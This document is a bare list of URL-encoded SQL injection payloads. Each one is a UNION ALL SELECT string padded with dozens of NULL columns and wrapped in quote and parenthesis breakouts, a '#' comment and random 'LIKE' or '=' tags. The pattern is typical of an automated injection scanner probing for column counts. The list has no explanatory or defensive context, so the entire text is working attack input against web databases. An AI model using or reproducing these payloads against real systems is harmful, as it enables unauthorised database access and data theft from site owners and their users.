1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27ghaD%27%20LIKE%20%27ghaD 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%27HISU%27%20LIKE%20%27HISU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27KWBW%27%20LIKE%20%27KWBW 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27rfch%27%20LIKE%20%27rfch 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27efhg%27%20LIKE%20%27efhg 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Twbs%27%20LIKE%20%27Twbs 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Bpwk%27%20LIKE%20%27Bpwk 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27HpLz%27%20LIKE%20%27HpLz 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27wtvz%27%20LIKE%20%27wtvz 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27hojm%27%20LIKE%20%27hojm 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27snZi%27%20LIKE%20%27snZi 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%27Znue%27%20LIKE%20%27Znue 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22QDeL%22%3D%22QDeL 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22rlNI%22%3D%22rlNI 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22zbaW%22%3D%22zbaW 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22jLrT%22%3D%22jLrT 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22kSAX%22%3D%22kSAX 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22EJIj%22%3D%22EJIj 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22sCkE%22%3D%22sCkE 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22uivm%22%3D%22uivm 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22nmbv%22%3D%22nmbv 1%22%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%22GCpH%22%3D%22GCpH 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Xgrr%22%3D%22Xgrr 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22aeXQ%22%3D%22aeXQ 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22oqFT%22%3D%22oqFT 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22mxFY%22%3D%22mxFY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22KcOY%22%3D%22KcOY 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22iIEw%22%3D%22iIEw 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22TCQj%22%3D%22TCQj 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22vizS%22%3D%22vizS 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22yzZm%22%3D%22yzZm 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22ELGi%22%3D%22ELGi 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22mmVw%22%3D%22mmVw 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22PhBk%22%3D%22PhBk 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Ylmm%22%3D%22Ylmm 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22fczF%22%3D%22fczF 